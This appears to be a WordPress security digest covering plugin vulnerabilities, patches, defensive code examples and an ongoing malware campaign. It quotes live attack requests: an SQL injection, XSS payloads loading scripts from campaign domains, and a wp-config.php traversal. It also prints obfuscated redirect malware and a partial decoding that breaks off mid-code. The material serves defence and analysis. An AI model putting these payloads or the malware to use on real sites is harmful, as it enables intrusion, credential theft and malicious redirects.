Vulnerable Plugins: June 2020 Update

This is a mid-month update to our regular Monthly Vulnerability Digest, covering a number of new patches for recently disclosed vulnerabilities.

 

Plugin                 | Vulnerability               | Patched Version | Installs
Elementor Page Builder | Authenticated Stored XSS    | 2.9.10          | 5,000,000
AdRotate               | Authenticated SQL Injection | 5.8.4           | 40,000
Brizy - Page Builder   | Improper Access Controls    | 1.0.126         | 60,000
Careerfy               | Unauthenticated XSS         | 3.9.0           | 5,000
SportsPress            | Authenticated Stored XSS    | 2.7.2           | 20,000
JobSearch              | Unauthenticated XSS         | 1.5.1           | 5,000
Newspaper              | Unauthenticated XSS         | 10.3.4          | 6,000
Multi Scheduler        | Record Deletion CSRF        | --              | 20

 

Highlights

  • Cross-site scripting is the most common vulnerability class in WordPress plugins
  • None of these vulnerabilities has been seen in mass exploitation campaigns so far

Relevant Plugins

SportsPress

SportsPress fixed an authenticated stored cross-site scripting vulnerability in version 2.7.2. The settings handler wrote the raw $_POST['sportspress_event_teams_delimiter'] value straight into the plugin option, so an authenticated attacker could store arbitrary HTML or script in it and have it executed wherever the delimiter is rendered on the site.

Because the bug is easy to weaponize in malware campaigns, we have been following it closely, but we have not detected any mass abuse of it as an attack vector. We believe this is primarily because exploitation requires an existing user account on the vulnerable site.
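As an added example (not SportsPress code), here is the unsafe save pattern the 2.7.2 patch corrects, beside a hardened handler. Function and option names are hypothetical; the WordPress APIs used (current_user_can, check_admin_referer, sanitize_text_field, wp_unslash, update_option, get_option, esc_html) are real, and the code must run inside WordPress:

```php
<?php
/*
 * Added example, not SportsPress code. Function and option names are
 * hypothetical; the WordPress functions called are real and this file is
 * meant to be loaded as part of a plugin, not run stand-alone.
 */

// Before: whatever reaches the save routine is written verbatim. A value such
// as '</span><script src="https://attacker.invalid/x.js"></script>' is stored
// and rendered on every page that prints the delimiter.
function example_save_delimiter_unsafe() {
    if ( isset( $_POST['example_delimiter'] ) ) {
        update_option( 'example_delimiter', $_POST['example_delimiter'] );
    }
}

// After: three independent controls on the write path.
function example_save_delimiter_safe() {
    // 1. Only users allowed to manage options may change them.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges.' );
    }
    // 2. A nonce ties the request to a form this user was actually shown,
    //    which blocks cross-site request forgery against the handler.
    check_admin_referer( 'example_save_delimiter', 'example_nonce' );

    if ( ! isset( $_POST['example_delimiter'] ) ) {
        return;
    }
    // 3. Strip tags and control characters before storing. wp_unslash()
    //    removes the slashes WordPress adds to $_POST, so the sanitizer sees
    //    the real value.
    $delimiter = sanitize_text_field( wp_unslash( $_POST['example_delimiter'] ) );
    // The option is a short separator ("vs", "-"), so cap its length too.
    $delimiter = mb_substr( $delimiter, 0, 10 );
    update_option( 'example_delimiter', $delimiter );
}

// Escaping on output is still required: sanitising on input is not a
// substitute, because other paths (imports, direct database edits, older
// plugin versions) can write the option without going through the handler.
function example_render_delimiter() {
    $delimiter = get_option( 'example_delimiter', 'vs' );
    echo '<span class="delimiter">' . esc_html( $delimiter ) . '</span>';
}
```

The patch in 2.7.2 adds only the third control on this line; the capability and nonce checks may live in the surrounding settings framework, and the output escaping depends on every template that prints the option.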

 

Patch:

Index: sportspress/tags/2.7.2/includes/admin/settings/class-sp-settings-events.php
===================================================================
--- a/sportspress/tags/2.7.2/includes/admin/settings/class-sp-settings-events.php
+++ b/sportspress/tags/2.7.2/includes/admin/settings/class-sp-settings-events.php         
         if ( isset( $_POST['sportspress_event_teams_delimiter'] ) )
-            update_option( 'sportspress_event_teams_delimiter', $_POST['sportspress_event_teams_delimiter'] );
+            update_option( 'sportspress_event_teams_delimiter', sanitize_text_field( $_POST['sportspress_event_teams_delimiter'] ) );
 }
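Review bot: sanitize_text_field() on the save path is only half the fix; the hunk does not show where the stored delimiter is printed, and that output still needs esc_html() or esc_attr(), since the option can be written by other code paths (imports, direct database edits) that never pass through this branch. Two smaller points on the same line: core convention is `sanitize_text_field( wp_unslash( $_POST['sportspress_event_teams_delimiter'] ) )` because $_POST is slashed, and nothing in the hunk shows a capability or nonce check guarding this write, which is worth confirming in the surrounding save routine.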

 

AdRotate

AdRotate fixed an authenticated SQL injection in version 5.8.4. Before the fix, the status and id request parameters were only passed through esc_attr(), an HTML attribute escaper that provides no protection in a SQL context; the patch adds numeric checks on both. We haven't detected any massive automated attacks targeting this plugin.

Patch:

    if(isset($_GET['status'])) $status = esc_attr($_GET['status']);
     if(isset($_GET['view'])) $view = esc_attr($_GET['view']);
     if(isset($_GET['id'])) $id = esc_attr($_GET['id']);
     if(isset($_GET['file'])) $file = esc_attr($_GET['file']);
+
+    if(!is_numeric($status)) $status = 0;
+    if(!is_numeric($id)) $id = 0;
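Review bot: the added is_numeric() checks on $status and $id still accept values PHP considers numeric but that are not plain integers, such as `1e3` or `1.5`; casting with absint() or intval() gives a guaranteed integer, and the values should still be bound with $wpdb->prepare() wherever the query is assembled. The two preceding lines leave $view and $file protected only by esc_attr(), which escapes for HTML attributes and does nothing for SQL or filesystem contexts; if either flows into a query or a path, it needs the same treatment.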

 

The majority of the public vulnerabilities in this mid-month update require an account on the vulnerable site, which lowers the odds of mass infections.

That being said, to mitigate risk from these recently patched vulnerabilities we strongly encourage all affected users to update their plugins as soon as possible.

Vulnerabilities Digest: May 2020

Relevant Plugins and Vulnerabilities:

Plugin                            | Vulnerability                  | Patched Version | Installs
WP Product Review                 | Unauthenticated Stored XSS     | 3.7.6           | 40,000
Form Maker by 10Web               | Authenticated SQL Injection    | ---             | 100,000
Add-on SweetAlert Contact Form 7  | Authenticated XSS              | 1.0.8           | 20
Paid Memberships Pro              | Authenticated SQL Injection    | 2.3.3           | 90,000
Visual Composer                   | Authenticated XSS              | 27              | 80,000
Team Members                      | Authenticated XSS              | 5.0.4           | 40,000
Photo Gallery by 10Web            | Unauthenticated SQL Injection  | 1.5.55          | 300,000
Login/Signup Popup                | Authenticated XSS              | 1.5             | 10,000
Easy Testimonials                 | Authenticated Stored XSS       | 3.6             | 30,000
WooCommerce                       | Unescaped Metadata             | 4.1.0           | 5,000,000
Page Builder by SiteOrigin        | CSRF to XSS                    | 2.10.16         | 1,000,000
Chopslider                        | Authenticated SQL Injection    | ---             | 200
Elementor Pro                     | Authenticated File Upload      | 2.9.4           | 100,000
LearnPress                        | Privilege Escalation           | 3.2.6.9         | 80,000
Elementor                         | Authenticated Stored XSS       | 2.9.8           | 4,000,000
Avada                             | Authenticated Stored XSS       | 6.2.3           | 500,000
Ninja Forms                       | CSRF to Stored XSS             | 3.4.24.2        | 1,000,000
Advanced Order Export For Woo     | Authenticated XSS              | 3.1.4           | 90,000
Quick Page/Post redirect          | Authenticated Settings Update  | ---             | 100,000
Ultimate Addons for Elementor     | Registration Bypass            | 1.24.2          | 100,000
WTI Like Post                     | Authenticated XSS              | ---             | 10,000
WP-Advanced-Search                | Authenticated SQL Injection    | 3.3.7           | 1,000
Gmedia Photo Gallery              | Authenticated XSS              | 1.18.5          | 10,000

Highlights for May 2020

  • Cross-site scripting is still the most prevalent vulnerability. Attackers take advantage of missing access restrictions on critical functions and of inadequate sanitization of user input.
  • Unprotected AJAX actions are still on the rise, and attackers are automating injections against the vulnerable plugins.
  • Attackers have added three plugins and a series of new malicious IPs to their arsenal in an ongoing massive malware campaign targeting WordPress websites with known vulnerabilities.

Details for these highlights can be found under the components listed below.

WP Product Review

Two weeks ago, we reported an unauthenticated stored cross-site scripting vulnerability in WP Product Review, caused by a REST route registered without a permission callback and by the review name being printed unescaped inside an HTML attribute.

Only a few days after the disclosure of this vulnerability, attackers began to scan for vulnerable sites:

181.58.21.65 - - [18/May/2020:17:21:10 +0000] "GET //wp-content/plugins/wp-product-review/assets/js/main.js HTTP/1.1"

139.198.16.241 - - [18/May/2020:17:15:36 +0000] "GET //wp-content/plugins/wp-product-review/readme.txt HTTP/1.1" 

185.162.127.248 - - [17/May/2020:03:38:15 +0000] "GET /wp-content/plugins/wp-product-review/assets/js/main.js HTTP/1.1" 

213.159.210.170 - - [17/May/2020:01:35:04 +0000] "GET /wp-content/plugins/wp-product-review/assets/js/main.js HTTP/1.1" 

Patch (version 3.7.6):

Index: wp-product-review/trunk/includes/gutenberg/class-wppr-gutenberg.php
===================================================================
--- a/wp-product-review/trunk/includes/gutenberg/class-wppr-gutenberg.php
+++ b/wp-product-review/trunk/includes/gutenberg/class-wppr-gutenberg.php
@@ -97,4 +97,7 @@
                 'methods'  => 'POST',
                 'callback' => array( $this, 'update_review_callback' ),
+                'permission_callback' => function () {
+                    return current_user_can( 'edit_posts' );
+                },
                 'args'     => array(
                     'id' => array(
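Review bot: adding permission_callback is the right fix, but `edit_posts` is granted to Contributors, so any low-privilege account can still reach update_review_callback; unless the callback checks `current_user_can( 'edit_post', $request['id'] )` on the specific review being updated, a Contributor can modify reviews on posts they do not own. This is also the only route visible in the hunk; any other register_rest_route() calls in the plugin deserve the same argument.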

---

Index: wp-product-review/trunk/includes/functions.php
===================================================================
--- a/wp-product-review/trunk/includes/functions.php
+++ b/wp-product-review/trunk/includes/functions.php
@@ -229,5 +229,5 @@
         }
         ?>
-        <a title="<?php echo $review_object->get_name(); ?>" class="<?php echo $class_a; ?>" href="<?php echo esc_url( $image_link ); ?>" <?php echo $lightbox; ?> rel="nofollow" target="_blank">
+        <a title="<?php echo esc_attr( $review_object->get_name() ); ?>" class="<?php echo $class_a; ?>" href="<?php echo esc_url( $image_link ); ?>" <?php echo $lightbox; ?> rel="nofollow" target="_blank">
             <img
                 src="<?php echo esc_attr( $src ); ?>"
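Review bot: only the title attribute is escaped on the changed line; `$class_a` and `$lightbox` are still echoed raw into the same <a> tag. If either is derived from review data or shortcode attributes it is a second injection point in the same element, so wrap `$class_a` in esc_attr() and build `$lightbox` from a fixed set of attribute strings (or escape its value) instead of echoing it as-is.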

Elementor

Earlier this month, the plugin Elementor Pro fixed an arbitrary file upload vulnerability caused by an unprotected Ajax hook. It wasn’t long before attackers started exploiting this vulnerability.

Our team identified these malicious IPs trying to fingerprint installations of both Elementor Pro and Ultimate Addons for Elementor by requesting static plugin assets:

69.164.207.140 - - [08/May/2020:15:59:31 +0000] "GET /wp-content/plugins/elementor-pro/assets/js/preview.min.js HTTP/1.1" 

45.79.193.100 - - [08/May/2020:16:49:13 +0000] "GET /wp-content/plugins/ultimate-elementor/assets/css/modules/business-hours.css HTTP/1.1" 

62.210.172.66 - - [10/May/2020:02:33:29 +0000] "GET /wp-content/plugins/ultimate-elementor/assets/min-js/uael-registration.min.js HTTP/1.1" 

62.210.84.69 - - [13/May/2020:08:13:57 +0000] "GET /wp-content/plugins/elementor-pro/assets/css/frontend.min.css HTTP/1.1" 

62.210.172.66 - - [13/May/2020:08:21:05 +0000] "GET /wp-content/plugins/elementor-pro/assets/css/frontend.min.css HTTP/1.1" 

[...]

Photo Gallery by 10Web

An unauthenticated SQL injection was fixed this month in the plugin Photo Gallery. The injection point is the bwg_search_<n> parameter handled by the bwg_frontend_data admin-ajax action, which is reachable without authentication.

Patch (version 1.5.55):

Index: photo-gallery/trunk/frontend/models/model.php
===================================================================
--- a/photo-gallery/trunk/frontend/models/model.php
+++ b/photo-gallery/trunk/frontend/models/model.php
@@ -197,32 +197,32 @@

   public function get_alb_gals_row( $bwg, $id, $albums_per_page, $sort_by, $order_by, $pagination_type = 0, $from = '' ) {
-    if ( $albums_per_page < 0 ) {
+    if ( $albums_per_page < 0 ) {
       $albums_per_page = 0;
     }
     global $wpdb;
-    $order_by = 'ORDER BY ' . ( (!empty($from) && $from === 'widget') ? 'id' : $sort_by ) . ' ' . $order_by;
-    if( $sort_by == 'random' || $sort_by == 'RAND()' ) {
-      $order_by = 'ORDER BY RAND()';
-    }
-    $search_where = '';
-    $search_value = trim( WDWLibrary::get('bwg_search_' . $bwg) );
-    if ( !empty($search_value) ) {
-      $search_keys = explode(' ', $search_value);
+    $order_by = 'ORDER BY ' . ( ( !empty( $from ) && $from === 'widget' ) ? 'id' : $sort_by ) . ' ' . $order_by;
+    if ( $sort_by == 'random' || $sort_by == 'RAND()' ) {
+      $order_by = 'ORDER BY RAND()';
+    }
+    $search_where = '';
+    $search_value = trim( WDWLibrary::get( 'bwg_search_' . $bwg ) );
+    if ( !empty( $search_value ) ) {
+      $search_keys = explode( ' ', $search_value );
       $alt_search = '(';
       $description_search = '(';
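Review bot: in the lines shown, the change to the $order_by assignment and to the search block is whitespace only; $sort_by is still concatenated straight into `ORDER BY`, and the `random`/`RAND()` comparison is the only validation visible. ORDER BY identifiers cannot go through $wpdb->prepare(), so $sort_by and $order_by should be resolved against an allowlist of column names and `ASC`/`DESC` before being interpolated. If that allowlist lives further down this 32-line hunk, the excerpt should include it; the search keys produced by `explode( ' ', $search_value )` are the vector used in the attacker payload, so how each key is escaped before entering the LIKE clause is the part a reviewer most needs to see.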

Payload used by attackers (raw, then URL-decoded):

185.162.127.248 -- POST -- /wp-admin/admin-ajax.php -- action=bwg_frontend_data&bwg_search_0=1%23+%25DFGDFG%22%29%29%2F%2A%2A%2FUNION%2F%2A%2A%2FALL%2F%2A%2A%2FSELECT%2F%2A%2A%2FTABLE_SCHEMA%2CTABLE_NAME%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2F%2A%2A%2Fas%2F%2A%2A%2Fdummy_3%2F%2A%2A%2Ffrom%2F%2A%2A%2Finformation_schema.tables%23FGDFGDFG%29%29%23&gallery_type=album_compact_preview&type_0=album -- 2020-05-17

Decoded, the bwg_search_0 value is (the run of empty-string columns is shortened here):

1# %DFGDFG"))/**/UNION/**/ALL/**/SELECT/**/TABLE_SCHEMA,TABLE_NAME,'', ... ,''/**/as/**/dummy_3/**/from/**/information_schema.tables#FGDFGDFG))#

The vulnerable code splits the search value on spaces (explode( ' ', $search_value ) in the patch above), so the second token is the one that matters: it closes the quoted LIKE clause with ")), appends a UNION SELECT against information_schema.tables to enumerate table names, and uses /**/ in place of spaces so the payload survives the split. The empty-string columns pad the SELECT to the column count of the original query.
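An added example, not AdRotate or Photo Gallery code, covering the two query shapes behind both SQL injection fixes above: numeric filters passed through esc_attr() (AdRotate) and a user-controlled ORDER BY built by string concatenation (Photo Gallery). The table and column names are hypothetical; $wpdb, absint(), $wpdb->prepare() and $wpdb->esc_like() are real WordPress APIs, so this runs inside WordPress:

```php
<?php
/*
 * Added example, not plugin code. Table and column names are hypothetical;
 * $wpdb and the helper functions are WordPress core APIs, so this must be
 * loaded inside WordPress rather than run stand-alone.
 */

// Unsafe: esc_attr() escapes for HTML attributes and does nothing for SQL,
// and $sort_by/$order_by are interpolated verbatim into ORDER BY, which is
// exactly the shape the attacker payload above targets.
function example_list_albums_unsafe( $id, $status, $sort_by, $order_by ) {
    global $wpdb;
    $id     = esc_attr( $id );
    $status = esc_attr( $status );
    return $wpdb->get_results(
        "SELECT * FROM {$wpdb->prefix}example_albums WHERE id = $id AND status = $status ORDER BY $sort_by $order_by"
    );
}

// Hardened version of the same query.
function example_list_albums_safe( $id, $status, $sort_by, $order_by, $search = '' ) {
    global $wpdb;

    // Numeric inputs: cast, do not test. absint( '1 UNION SELECT ...' ) is 1,
    // whereas is_numeric() would still accept '1e3' or '1.5'.
    $id     = absint( $id );
    $status = absint( $status );

    // ORDER BY cannot be a bound parameter, so identifiers come from an
    // allowlist and the request merely selects a key into it.
    $sortable  = array( 'id' => 'id', 'name' => 'name', 'order' => 'sort_order' );
    $column    = isset( $sortable[ $sort_by ] ) ? $sortable[ $sort_by ] : 'id';
    $direction = ( strtoupper( (string) $order_by ) === 'DESC' ) ? 'DESC' : 'ASC';

    $sql  = "SELECT * FROM {$wpdb->prefix}example_albums WHERE id = %d AND status = %d";
    $args = array( $id, $status );

    // Free-text search: esc_like() neutralises % and _ wildcards, then the
    // whole value is bound as a string with %s. A token such as ")) UNION
    // SELECT ..." becomes a literal search string, not SQL.
    if ( '' !== $search ) {
        $sql   .= ' AND name LIKE %s';
        $args[] = '%' . $wpdb->esc_like( $search ) . '%';
    }

    // $column and $direction were chosen from constants above, so
    // interpolating them is safe.
    $sql .= " ORDER BY $column $direction";

    return $wpdb->get_results( $wpdb->prepare( $sql, $args ) );
}
```

The allowlist lookup is the part most often skipped: developers reach for $wpdb->prepare() and discover it cannot quote a column name, then fall back to concatenation, which is how ORDER BY injections survive in otherwise prepared code.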

Plugin & Theme Payloads Added to Ongoing Campaign

Malicious Domains & Detected IPs

Our team saw the following new malicious domains injected into an ongoing campaign exploiting known WordPress vulnerabilities this month:

css[.]digestcolect[.]com
cls[.]balantfromsun[.]com
count[.]trackstatisticsss[.]com

The following IPs have also been associated with this campaign:

79.133.202.70
154.43.128.23
185.162.127.248
51.83.70.152
213.159.210.170
139.162.28.41
139.99.169.192
185.217.0.224
84.238.108.177
62.210.180.8
[...]

 

Exploit Attempts Seen in the Wild

Our team identified attacks against the following vulnerable plugins and themes.

Bold Page Builder (from last year)
139.162.28.41 -- POST -- /wp-admin/admin-ajax.php?action=bt_bb_set_custom_css -- css=%3C%2Fstyle%3E%3Cscript++type%3Dtext%2Fjavascript+language%3Djavascript%3Eeval%28String.fromCharCode%2832%2C40%2C102%2C117%2C110%2C99%2C116%2C105%2C111%2C110%2C40%2C41%2C32%2C123%2C10%2C32%2C32%2C32%2C32%2C118%2C97%2C114%2C32%2C101%2C108%2C101%2C109%2C32%2C61%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C99%2C114%2C101%2C97%2C116%2C101%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C40%2C39%2C115%2C99%2C114%2C105%2C112%2C116%2C39%2C41%2C59%2C32%2C10%2C9%2C101%2C108%2C101%2C109%2C46%2C116%2C121%2C112%2C101%2C32%2C61%2C32%2C39%2C116%2C101%2C120%2C116%2C47%2C106%2C97%2C118%2C97%2C115%2C99%2C114%2C105%2C112%2C116%2C39%2C59%2C32%2C10%2C32%2C32%2C32%2C32%2C101%2C108%2C101%2C109%2C46%2C115%2C114%2C99%2C32%2C61%2C32%2C39%2C104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%2C99%2C108%2C115%2C46%2C98%2C97%2C108%2C97%2C110%2C116%2C102%2C114%2C111%2C109%2C115%2C117%2C110%2C46%2C99%2C111%2C109%2C47%2C99%2C108%2C115%2C46%2C106%2C115%2C63%2C122%2C61%2C54%2C38%2C39%2C59%2C10%2C32%2C32%2C32%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C103%2C101%2C116%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C115%2C66%2C121%2C84%2C97%2C103%2C78%2C97%2C109%2C101%2C40%2C34%2C104%2C101%2C97%2C100%2C34%2C41%2C91%2C48%2C93%2C46%2C97%2C112%2C112%2C101%2C110%2C100%2C67%2C104%2C105%2C108%2C100%2C40%2C101%2C108%2C101%2C109%2C41%2C59%2C10%2C32%2C32%2C125%2C41%2C40%2C41%2C59%29%29%3B%3C%2Fscript%3E%3Cstyle%3E&post_id=1 -- 2020-05-12

The css parameter breaks out of the stylesheet with </style> and injects a script that calls eval() on a String.fromCharCode() sequence. The character codes decode to a loader for cls[.]balantfromsun[.]com, one of the campaign domains listed above:

 (function() {
    var elem = document.createElement('script');
	elem.type = 'text/javascript';
    elem.src = 'https://cls.balantfromsun.com/cls.js?z=6&';
    document.getElementsByTagName("head")[0].appendChild(elem);
  })();

WP Quick Booking Manager (from 4 years ago)
139.162.28.41 - action=gen_save_cssfixfront&css=%3C%2Fstyle%3E%3Cscript+type%3D%27text%2Fjavascript%27+src%3D%27https%3A%2F%2Fcss.digestcolect.com%2Fstm%3Fv%3Dl6.0.0%27%3E%3C%2Fscript%3E%3Cstyle%3E&cssfix=front [12/May/2020:04:52:19 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 

Same technique, different target: the css value decodes to </style><script type='text/javascript' src='https://css.digestcolect.com/stm?v=l6.0.0'></script><style>, loading the campaign's css[.]digestcolect[.]com domain.

Duplicator Download
62.210.180.8 - - [14/May/2020:14:45:54 +0000] "GET /wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php HTTP/1.1" 

This one is a directory traversal in the duplicator_download AJAX action, used here to read wp-config.php and with it the site's database credentials.
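The requests above share a handful of traits that are easy to spot once the encoding is undone. As an added example, not Sucuri tooling, the following script normalises access-log lines the way an analyst would by hand (URL-decoding, stripping /**/ comment padding, expanding String.fromCharCode) and flags the patterns from this campaign. The sample lines are constructed for this example and modelled on the quoted requests; the rule names are the author's, not Sucuri signatures:

```php
<?php
/*
 * Added example, not Sucuri tooling. Sample log lines are constructed;
 * rule names are the author's choice. Usage: php scan.php [access.log]
 */

// Expand eval(String.fromCharCode(60,115,...)) into the text it builds so the
// rules below see the real payload rather than a list of numbers.
function example_decode_fromcharcode( string $s ): string {
    return preg_replace_callback(
        '/String\.fromCharCode\(([\d,\s]+)\)/i',
        function ( array $m ): string {
            $out = '';
            foreach ( explode( ',', $m[1] ) as $code ) {
                $out .= chr( (int) trim( $code ) );
            }
            return $out;
        },
        $s
    );
}

// URL-decode up to three times (payloads are often double-encoded), replace
// /**/ comment padding with spaces, then expand character-code obfuscation.
function example_normalise( string $s ): string {
    for ( $i = 0; $i < 3; $i++ ) {
        $d = urldecode( $s );
        if ( $d === $s ) {
            break;
        }
        $s = $d;
    }
    $s = preg_replace( '#/\*.*?\*/#s', ' ', $s );
    return example_decode_fromcharcode( $s );
}

// Names of the rules that matched; an empty array means the line looks benign.
function example_classify( string $line ): array {
    $n     = example_normalise( $line );
    $rules = array(
        'sqli_union'      => '/\bunion\s+(all\s+)?select\b/i',
        'sqli_schema'     => '/\binformation_schema\./i',
        'xss_style_break' => '/<\/style>\s*<script/i',
        'js_remote_load'  => '/<script[^>]+src\s*=|\.src\s*=\s*[\'"]https?:/i',
        'lfi_traversal'   => '/(\.\.[\/\\\\])+wp-config\.php/i',
        'ajax_endpoint'   => '/admin-ajax\.php/i',
    );
    $hits = array();
    foreach ( $rules as $name => $re ) {
        if ( preg_match( $re, $n ) ) {
            $hits[] = $name;
        }
    }
    // admin-ajax.php on its own is ordinary traffic (heartbeat, editors), so
    // only report it together with another hit.
    return ( $hits === array( 'ajax_endpoint' ) ) ? array() : $hits;
}

// Constructed sample lines in the two formats quoted above: the "--" request
// summaries and raw Apache combined-log lines. The fromCharCode sequence in the
// first line spells  elem.src="https://  .
function example_sample_lines(): array {
    return array(
        '139.162.28.41 -- POST -- /wp-admin/admin-ajax.php?action=bt_bb_set_custom_css -- css=%3C%2Fstyle%3E%3Cscript%3Eeval%28String.fromCharCode%28101%2C108%2C101%2C109%2C46%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%29%29%3C%2Fscript%3E%3Cstyle%3E&post_id=1',
        '185.162.127.248 -- POST -- /wp-admin/admin-ajax.php -- action=bwg_frontend_data&bwg_search_0=1%23+%22%29%29%2F%2A%2A%2FUNION%2F%2A%2A%2FALL%2F%2A%2A%2FSELECT%2F%2A%2A%2FTABLE_SCHEMA%2CTABLE_NAME%2F%2A%2A%2Ffrom%2F%2A%2A%2Finformation_schema.tables%23',
        '62.210.180.8 - - [14/May/2020:14:45:54 +0000] "GET /wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php HTTP/1.1"',
        '203.0.113.7 - - [14/May/2020:14:46:00 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1"',
    );
}

if ( PHP_SAPI === 'cli' ) {
    $lines = isset( $argv[1] )
        ? file( $argv[1], FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES )
        : example_sample_lines();
    foreach ( $lines as $line ) {
        $hits = example_classify( $line );
        if ( $hits ) {
            printf( "ALERT %-40s %s\n", implode( ',', $hits ), substr( $line, 0, 80 ) );
        }
    }
}
```

Run without arguments it reports three of the four sample lines (the heartbeat request is ignored); pointed at a real access log it prints one ALERT line per matching request. The decode-before-match step is the important part: matching the raw encoded line would miss both the /**/ padded UNION and the character-coded loader.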

Many other plugins are still under attack and public exploits already exist for all of the components listed above. Please check our previous lab notes for more information about this ongoing WordPress Malware campaign.

To mitigate threat, we strongly encourage you to keep your software up to date to prevent infection and mitigate risk to your environment. Websites behind the Sucuri Firewall are protected against these exploits.

Face Mask Spam Links Injected in WordPress Database

During a recent malware removal request, we found a compromised WordPress site being used to redirect to spam websites. The campaign was leveraging an increase in search queries related to face masks.

To make their campaign more difficult to detect and boost SEO rankings, the attackers use a multitude of compromised third-party websites to funnel their traffic. They also use the World Health Organization name and images to add credibility to their campaign.

World Health Organization spam image

Spam links are injected into widget entries stored in the wp_options table, so the compromised site ends up linking to third-party sites trying to rank for face mask search terms.

Face mask spam links

The spam links are hidden from visitors with <div style="display:none;">, and all of them lead to the Shopify store https://lundybright[.]fr/, which was registered on March 2nd.

Compromised websites impacted by this spam campaign can use our hacked website cleanup guide to remove the infection.

web.config redirect malware

We recently found this malware on a Windows hosting server where the web.config file had been modified with the following code:

The code redirects visitors with particular user agents, and visitors referred from Google, Yahoo, MSN and other search engines, to conceit-gleaned.php.
The file conceit-gleaned.php contains the malware, encoded to evade detection, but we were able to reverse it and recover the plain-text code. The malware communicates with gettheseorders[dot]ru to obtain the destination for each redirect. In this case it redirected to Viagra-related pages, but the destination is chosen remotely and could be anything in the future.

This is the malware added to the file conceit-gleaned.php:

<?php $ZdcIihIC="bSh8gtxCo6JlYQiK4AkwdIDe_VnN7OTfFr3sPZHaG291jRUqmcvXMzEy50puLWB";$wHnnxSifPdjM=$ZdcIihIC[0].
 $ZdcIihIC[39] . $ZdcIihIC[35] . $ZdcIihIC[23]. $ZdcIihIC[9] .$ZdcIihIC[16] . $ZdcIihIC[24]. $ZdcIihIC[20] .
 $ZdcIihIC[23]. $ZdcIihIC[49].$ZdcIihIC[8].$ZdcIihIC[20] .$ZdcIihIC[23];$cQBlOMOpUwc=$ZdcIihIC[4].$ZdcIihIC[53] .
 $ZdcIihIC[14].$ZdcIihIC[26] .$ZdcIihIC[31] .$ZdcIihIC[11] . $ZdcIihIC[39] .$ZdcIihIC[5]. $ZdcIihIC[23];
 $bHUDmvkyJ=$ZdcIihIC[23]. $ZdcIihIC[33].$ZdcIihIC[33] . $ZdcIihIC[8] .$ZdcIihIC[33] .$ZdcIihIC[24] .
  $ZdcIihIC[33] .$ZdcIihIC[23]. $ZdcIihIC[58] .$ZdcIihIC[8]. $ZdcIihIC[33] .$ZdcIihIC[5].$ZdcIihIC[14]. 
  $ZdcIihIC[26] .$ZdcIihIC[4];$cBpAXxrcExTv=$ZdcIihIC[49].$ZdcIihIC[33]. $ZdcIihIC[23] . $ZdcIihIC[39].
   $ZdcIihIC[5]. $ZdcIihIC[23].$ZdcIihIC[24]. $ZdcIihIC[31]. $ZdcIihIC[59]. $ZdcIihIC[26].$ZdcIihIC[49]. 
   $ZdcIihIC[5]. $ZdcIihIC[14]. $ZdcIihIC[8] . $ZdcIihIC[26];$bHUDmvkyJ(0);
   $jOfMRiAkmjE=$cBpAXxrcExTv("",$cQBlOMOpUwc($wHnnxSifPdjM("vRhrU9u49nM6w3/wut5i36ZOwqPbKZjClrRlymtDaOfewngUWyFa/
BD00Jz7anEV+JKgEXX5qhb3XF/5/AA==")));$jOfMRiAkmjE();?>

We were able to reverse it. Here is the full script after decoding; the redirect logic is in the branch that handles search-engine referrers ($se) near the end:

set_time_limit(0);
function change_page_regex($page, $links,$reg,$res){
$elements = array(); if (preg_match_all($reg, $page, $result)) { 
$elements = $result[$res]; $elements = array_unique($elements);
$m=min(count($links),count($elements));
for ($i = 0; $i < $m; $i++) { $link = array_shift($links); $element = array_shift($elements); $page = preg_replace('/' . preg_quote($element, '/') . '/', '$0 ' . $link, $page, 1); } if (count($links)>0){ $element = "<p>"; $element .= implode("<br>\n", $links); $element .= "</p>"; $page = preg_replace('/\<\/body\>/i', "\n" . $element . "\n$0", $page, 1); return $page;}
function curly_page_get($url,$useragent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"){ $ch = curl_init (); curl_setopt ($ch, CURLOPT_URL,$url); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_TIMEOUT, 3000); curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt ($ch, CURLOPT_USERAGENT, $useragent); $result = curl_exec ($ch); $curly_page_get_info=curl_getinfo($ch);
curl_close($ch); return array($result,$curly_page_get_info);}
function get_proxy_page(){ $proto=stripos(@$_SERVER['SERVER_PROTOCOL'],'https') === true ? 'https://' : 'http://'; $crurl=$proto.@$_SERVER['HTTP_HOST'].@$_SERVER['REQUEST_URI']; list($buf,$curly_page_get_info)=curly_page_get($crurl);
$ct=@$curly_page_get_info['content_type']; $nexturl=@$curly_page_get_info['redirect_url']; $status=@$curly_page_get_info['http_code']; if (status!="")header("Status: $status");
if ($ct!=""){ header("Content-type: $ct"); if ($nexturl!=""){ header("Location: $nexturl"); return array($buf,$ct);
}
if (function_exists('sys_get_temp_dir')) {$tmppath = sys_get_temp_dir();if (!is_dir($tmppath)){ $tmppath = (dirname(__FILE__)); } } else { $tmppath = (dirname(__FILE__));}
$content="";$x=@$_POST["pppp_check"];$md5pass="e5e4570182820af0a183ce1520afe43b";
$host=@$_SERVER["HTTP_HOST"];$uri=@$_SERVER["REQUEST_URI"];$host=str_replace("www.","",$host);$md5host=md5($host);$urx=$host.$uri;$md5urx=md5($urx);
$tmppath=$tmppath."/.".$md5host."/";@mkdir($tmppath);
